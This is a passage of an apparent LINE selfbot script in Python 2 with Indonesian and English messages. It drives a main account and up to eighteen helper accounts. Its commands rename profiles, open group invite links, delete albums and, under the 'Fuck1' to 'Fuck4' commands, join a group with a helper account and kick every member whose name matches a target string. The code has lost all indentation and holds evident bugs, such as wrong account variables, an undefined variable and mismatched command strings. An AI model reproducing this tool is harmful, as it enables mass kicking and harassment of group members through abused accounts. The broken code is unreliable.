elif "All:" in msg.text:
string = msg.text.replace("All:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki6.getProfile()
profile.displayName = string
ki6.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki7.getProfile()
profile.displayName = string
ki7.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki8.getProfile()
profile.displayName = string
ki8.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki9.getProfile()
profile.displayName = string
ki9.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki10.getProfile()
profile.displayName = string
ki10.updateProfile(profile)
elif "Allbio:" in msg.text:
string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki2.getProfile()
profile.statusMessage = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki3.getProfile()
profile.statusMessage = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki4.getProfile()
profile.statusMessage = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki5.getProfile()
profile.statusMessage = string
ki5.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki6.getProfile()
profile.statusMessage = string
ki6.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki7.getProfile()
profile.statusMessage = string
ki7.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki8.getProfile()
profile.statusMessage = string
ki8.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki9.getProfile()
profile.statusMessage = string
ki9.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki10.getProfile()
profile.statusMessage = string
ki10.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki11.getProfile()
profile.statusMessage = string
ki11.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki12.getProfile()
profile.statusMessage = string
ki12.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki13.getProfile()
profile.statusMessage = string
ki13.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki14.getProfile()
profile.statusMessage = string
ki14.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki15.getProfile()
profile.statusMessage = string
ki15.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki16.getProfile()
profile.statusMessage = string
ki16.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki17.getProfile()
profile.statusMessage = string
ki17.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki18.getProfile()
profile.statusMessage = string
ki18.updateProfile(profile)
elif "Mybio:" in msg.text:
string = msg.text.replace("Mybio:","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Bio👉" + string + "👈")
elif msg.text in ["Mypict"]:
h = cl.getContact(mid)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
#------------------------------------------------------------------------------------------#
elif "Cn " in msg.text:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉 " + string + "👈")
#---------------------------------------------------------
elif "B1name " in msg.text:
string = msg.text.replace("B1name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B2name " in msg.text:
string = msg.text.replace("B2name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
ki2.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B3name " in msg.text:
string = msg.text.replace("B3name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
ki3.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B4name " in msg.text:
string = msg.text.replace("B4name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
ki4.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B5name " in msg.text:
string = msg.text.replace("B5name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
ki5.sendText(msg.to," Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B6name " in msg.text:
string = msg.text.replace("B6name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki6.getProfile()
profile.displayName = string
ki6.updateProfile(profile)
ki6.sendText(msg.to,"Update Names��" + string + "👈")
#---------------------------------------------------------
elif "B7name " in msg.text:
string = msg.text.replace("B7name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki7.getProfile()
profile.displayName = string
ki7.updateProfile(profile)
ki7.sendText(msg.to,"Update Names👉" + string + "👈")
#---------------------------------------------------------
elif "B8name " in msg.text:
string = msg.text.replace("B8name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki8.getProfile()
profile.displayName = string
ki8.updateProfile(profile)
ki8.sendText(msg.to,"Update Names👉" + string + "👈")
#---------------------------------------------------------
elif "B9name " in msg.text:
string = msg.text.replace("B9name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki9.getProfile()
profile.displayName = string
ki9.updateProfile(profile)
ki9.sendText(msg.to,"Update Names👉" + string + "👈")
#---------------------------------------------------------
elif "B10name " in msg.text:
string = msg.text.replace("B10name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki10.getProfile()
profile.displayName = string
ki10.updateProfile(profile)
ki10.sendText(msg.to,"Update Names👉" + string + "👈")
#---------------------------------------------------------
elif "B11name " in msg.text:
string = msg.text.replace("B11name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki11.getProfile()
profile.displayName = string
ki11.updateProfile(profile)
ki11.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B12name " in msg.text:
string = msg.text.replace("B12name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki12.getProfile()
profile.displayName = string
ki12.updateProfile(profile)
ki12.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B13name " in msg.text:
string = msg.text.replace("B13name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki13.getProfile()
profile.displayName = string
ki13.updateProfile(profile)
ki13.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B14name " in msg.text:
string = msg.text.replace("B14name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki14.updateProfile(profile)
ki14.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B15name " in msg.text:
string = msg.text.replace("B15name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki15.getProfile()
profile.displayName = string
ki15.updateProfile(profile)
ki15.sendText(msg.to," Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B16name " in msg.text:
string = msg.text.replace("B16name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki16.getProfile()
profile.displayName = string
ki16.updateProfile(profile)
ki16.sendText(msg.to,"Update Names👉" + string + "👈")
#---------------------------------------------------------
elif "B17name " in msg.text:
string = msg.text.replace("B17name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki17.getProfile()
profile.displayName = string
ki17.updateProfile(profile)
ki17.sendText(msg.to,"Update Names👉" + string + "👈")
#---------------------------------------------------------
elif "B18name " in msg.text:
string = msg.text.replace("B18name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki18.getProfile()
profile.displayName = string
ki18.updateProfile(profile)
ki8.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "Sc:" in msg.text:
mmid = msg.text.replace("Mid:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text.lower() == 'contact:on':
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah On")
else:
cl.sendText(msg.to,"It is already open")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already open ✔")
else:
cl.sendText(msg.to,"It is already open ")
elif msg.text.lower() == 'contact:off':
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"sudah off ✖")
else:
cl.sendText(msg.to,"It is already off ✖")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"off already")
else:
cl.sendText(msg.to,"already Close ✔")
elif msg.text in ["Pro:on"]:
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Enable ✔")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Enable✔")
else:
cl.sendText(msg.to,"It is already On ✔")
elif msg.text in ['Prolink:on']:
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Link Protection Enable ✔")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Link Protect Enable")
else:
cl.sendText(msg.to,"It is already On ô€¨")
elif msg.text in ['Proinvite:on']:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite Protect Enable ✔")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite Protect Enable")
else:
cl.sendText(msg.to,"It is already On ¨")
elif msg.text in ['Procancel:on']:
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Protection Enable ✔")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON✔")
else:
cl.sendText(msg.to,"It is already On ✔")
elif msg.text.lower() == 'join:on':
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on✔")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already ON✔")
else:
cl.sendText(msg.to,"It is already On ✔")
elif msg.text.lower() == 'blocklist':
blockedlist = cl.getBlockedContactIds()
cl.sendText(msg.to, "Please wait...")
kontak = cl.getContacts(blockedlist)
num=1
msgs="✖User Blocked List✖\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text.lower() == 'join:off':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Auto Join Already Off✔")
else:
cl.sendText(msg.to,"Auto Join set off✔")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close✔")
else:
cl.sendText(msg.to,"It is already open ✔")
elif msg.text in ["Pro:off"]:
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Disable ✔")
else:
cl.sendText(msg.to,"sudah dimatikan ✔")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close")
else:
cl.sendText(msg.to,"It is already open ✔")
elif msg.text in ["Prolink:off"]:
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Link Protection Disable ✖")
else:
cl.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close✖")
else:
cl.sendText(msg.to,"It is already open ✔")
elif msg.text in ["Proinvite:off"]:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite Protection Disable ✖")
else:
cl.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close✖")
else:
cl.sendText(msg.to,"It is already open ✔")
elif msg.text in ["Procancel:off"]:
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Protection Disable ✖")
else:
cl.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already close✖")
else:
cl.sendText(msg.to,"It is already open ✔")
elif "Gcancel:" in msg.text:
try:
strnum = msg.text.replace("Group cancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Itu off undangan ditolak✖\nSilakan kirim dengan menentukan jumlah orang ketika Anda menghidupkan✖")
else:
cl.sendText(msg.to,"Off undangan ditolak✖Sebutkan jumlah terbuka ketika Anda ingin mengirim")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis✔")
else:
cl.sendText(msg.to,strnum + "The team declined to create the following automatic invitation")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Nilai tidak benar✖")
else:
cl.sendText(msg.to,"Weird value✖")
elif msg.text in ["Leave:on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on✔")
else:
cl.sendText(msg.to,"Sudah terbuka ✔")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done✔")
else:
cl.sendText(msg.to,"Is already open✔")
elif msg.text in ["Leave:off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"off✖")
else:
cl.sendText(msg.to,"Sudah off✖")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done✔")
else:
cl.sendText(msg.to,"Is already close✔")
elif msg.text in ["Share:on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done ✔")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ✖")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"on ✔")
else:
cl.sendText(msg.to,"on ✔")
elif msg.text in ["Share:off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done✔")
else:
cl.sendText(msg.to,"It is already turned off ✔")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off ✖")
else:
cl.sendText(msg.to,"Off ✖")
elif msg.text.lower() == 'set':
md = "{==℘ґ∂ηк в❍тѕ==}\n||=S E T T I N G=||\n\n"
if wait["contact"] == True: md+="✬ Contact:on ✔\n"
else: md+="✬ Contact:off ✖\n"
if wait["autoJoin"] == True: md+="✬ Join:on ✔\n"
else: md +="✬ Join:off ✖\n"
if wait["autoCancel"]["on"] == True:md+="✬ Gcancel:" + str(wait["autoCancel"]["members"]) + " ✔\n"
else: md+= "✬Gcancel:off ✖\n"
if wait["leaveRoom"] == True: md+="✬ Leave:on ✔\n"
else: md+="✬ Leave:off ✖\n"
if wait["timeline"] == True: md+="✬ Share:on ✔\n"
else:md+="✬ Share:off ✖\n"
if wait["autoAdd"] == True: md+="✬ Add:on ✔\n"
else:md+="✬ Add:off ✖\n"
if wait["commentOn"] == True: md+="✬ Com:on ✔\n"
else:md+="✬ Com:off ✖\n\n❴•PROTECTION GROUPS•❵\n"
if wait["protect"] == True: md+="✫ Protect:on ✔\n"
else:md+="✫ Protect:off ✖\n"
if wait["linkprotect"] == True: md+="✫ Prolink:on ✔\n"
else:md+="✫ Prolink:off ✖\n"
if wait["inviteprotect"] == True: md+="✫ Proinvite:on ✔\n"
else:md+="✫ Proinvite:off ✖\n"
if wait["cancelprotect"] == True: md+"✫ Procancel:on ✔\n"
else:md+="✫ Procancel:off ✖\n"
cl.sendText(msg.to,md + "\n\n{==℘ґ∂ηк в❍тѕ==}")
# msg.contentType = 13
# msg.contentMetadata = {'mid': admsa}
# cl.sendMessage(msg)
elif "Gowner" == msg.text:
try:
group = cl.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
cl.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
cl.sendMessage(M)
cl.sendText(msg.to,"old user")
elif cms(msg.text,["Add"]):
msg.contentType = 13
msg.contentMetadata = {'mid': 'u5818cb4404411c2e2e6e6937d172cca8'}
cl.sendText(msg.to,"❂•••••••••✧••••••••••❂")
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': 'udfaf52176415b46cb445ae2757ec85f3'}
cl.sendMessage(msg)
cl.sendText(msg.to,"❂••••••••✰•✰••••••••❂")
elif "Set album:" in msg.text:
gid = msg.text.replace("Set album:","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada album👈")
else:
cl.sendText(msg.to,"Dalam album tidak👈")
else:
if wait["lang"] == "JP":
mg = "Berikut ini adalah album dari target"
else:
mg = "Berikut ini adalah subjek dari album"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "æžš\n"
else:
mg += str(y["title"]) + ":0 Pieces\n"
cl.sendText(msg.to,mg)
elif "Album" in msg.text:
gid = msg.text.replace("Album","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada album")
else:
cl.sendText(msg.to,"Dalam album tidak")
else:
if wait["lang"] == "JP":
mg = "Berikut ini adalah album dari target"
else:
mg = "Berikut ini adalah subjek dari album"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "\n"
else:
mg += str(y["title"]) + ":0 pieces\n"
elif "Hapus album " in msg.text:
gid = msg.text.replace("Hapus album ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["gid"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Soal album telah dihapus")
else:
cl.sendText(msg.to,str(i) + "Hapus kesulitan album🛡")
elif msg.text.lower() == 'group id':
gid = cl.getGroupIdsJoined()
h = "❂•••••••L I S T I D G R O U P•••••••❂\n "
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text.lower() == 'all:out':
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = ki2.getGroupIdsJoined()
# gid = ki3.getGroupIdsJoined()
# gid = ki4.getGroupIdsJoined()
# gid = ki5.getGroupIdsJoined()
# gid = ki6.getGroupIdsJoined()
for i in gid:
ki.leaveGroup(i)
ki2.leaveGroup(i)
# ki3.leaveGroup(i)
# ki4.leaveGroup(i)
# ki5.leaveGroup(i)
# ki6.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kitsune Bot Sudah Keluar Di semua grup")
else:
cl.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Gcancelall"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku menolak semua undangan")
else:
cl.sendText(msg.to,"He declined all invitations")
elif "Album deleted:" in msg.text:
gid = msg.text.replace("Album deleted:","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Soal album telah dihapus👈")
else:
cl.sendText(msg.to,str(i) + "Hapus kesulitan album👈")
elif msg.text in ["Add:on","Add auto on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On✔")
else:
cl.sendText(msg.to,"Already On✔")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On✔")
else:
cl.sendText(msg.to,"Already On✔")
elif msg.text in ["Add:off","Add auto off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off✖")
else:
cl.sendText(msg.to,"Hal ini sudah dimatikan✖")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already Off✖")
else:
cl.sendText(msg.to,"Untuk mengaktifkan-off✖")
elif "Message set:" in msg.text:
wait["message"] = msg.text.replace("Message set:","")
cl.sendText(msg.to,"✨We changed the message✨")
elif "Help set:" in msg.text:
wait["help"] = msg.text.replace("Help set:","")
cl.sendText(msg.to,"✨We changed the Help✨")
elif "Msg add-" in msg.text:
wait["message"] = msg.text.replace("Pesan add-","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨Kami mengubah pesan✨")
else:
cl.sendText(msg.to,"Change information")
elif msg.text in ["Pesan add cek","Message confirm"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Additional information is automatically set to the following \n\n" + wait["message"])
else:
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif msg.text in ["Change","change"]:
if wait["lang"] =="JP":
wait["lang"] = "TW"
cl.sendText(msg.to,"I changed the language to engglis✔")
else:
wait["lang"] = "JP"
cl.sendText(msg.to,"I changed the language to indonesia✔")
elif "Message set" in msg.text:
c = msg.text.replace("Message set","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Is a string that can not be changed✔")
else:
wait["comment"] = c
cl.sendText(msg.to,"✨This has been changed✨\n\n" + c)
elif "Com set:" in msg.text:
c = msg.text.replace("Come Set:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah✔")
else:
wait["comment"] = c
cl.sendText(msg.to,"Ini telah diubah✔\n\n" + c)
elif msg.text in ["Comment:on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku berada di✔")
else:
cl.sendText(msg.to,"To open✔")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"✔")
else:
cl.sendText(msg.to,"✔")
elif msg.text in ["Com:off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off ✖")
else:
cl.sendText(msg.to,"It is already turned off ✖")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off✖")
else:
cl.sendText(msg.to,"To turn off✖")
elif msg.text in ["Com","Comment"]:
cl.sendText(msg.to,"✨Auto komentar saat ini telah ditetapkan sebagai berikut✨\n\n" + str(wait["comment"]))
elif msg.text in ["Glink","Url"]:
if msg.toType == 2:
g = cl.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
cl.updateGroup(g)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok")
else:
cl.sendText(msg.to,"Tidak dapat digunakan untuk kelompok selain")
elif "gurl+" in msg.text:
if msg.toType == 2:
gid = msg.text.replace("gurl+","")
gurl = cl.reissueGroupTicket(gid)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
cl.sendText(msg.to,"グループ以外ã§ã¯ä½¿ç”¨ã§ãã¾ã›ã‚“👈")
elif "gurl" in msg.text:
if msg.toType == 1:
tid = msg.text.replace("gurl","")
turl = ki.getUserTicket(tid)
ki.sendText(msg.to,"line://ti/p" + turl)
else:
ki.sendText(msg.to,"error")
elif msg.text in ["Gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
# else:
# cl.sendText(msg.to,"Tidak dapat digunakan untuk kelompok selain")
elif msg.text in ["Comban"]:
wait["wblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklist…”✚")
elif msg.text in ["Comban del"]:
wait["dblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklist…”✚")
elif msg.text in ["Comban cek"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"Nothing in the blacklist✖")
else:
cl.sendText(msg.to,"The following is a blacklist✔")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'Clock:on':
if wait["clock"] == True:
cl.sendText(msg.to,"Sudah On")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Jam on✔")
elif msg.text.lower() == 'Clock:off':
if wait["clock"] == False:
cl.sendText(msg.to,"Hal ini sudah off✖")
else:
wait["clock"] = False
cl.sendText(msg.to," Dimatikan ✔")
elif "Clockname " in msg.text:
n = msg.text.replace("Jam say ","")
if len(n.decode("utf-8")) > 30:
cl.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
cl.sendText(msg.to,"Ini telah diubah✔\n\n" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Diperbarui✔")
else:
cl.sendText(msg.to,"✨Silahkan Aktifkan Nama✨")
elif "Fuck1 " in msg.text:
nk0 = msg.text.replace("Fuck1 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck2 " in msg.text:
nk0 = msg.text.replace("Fuck2 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki2.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki2.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck3 " in msg.text:
nk0 = msg.text.replace("Fuck3 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki3.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki3.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck4 " in msg.text:
nk0 = msg.text.replace("Fuck4 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
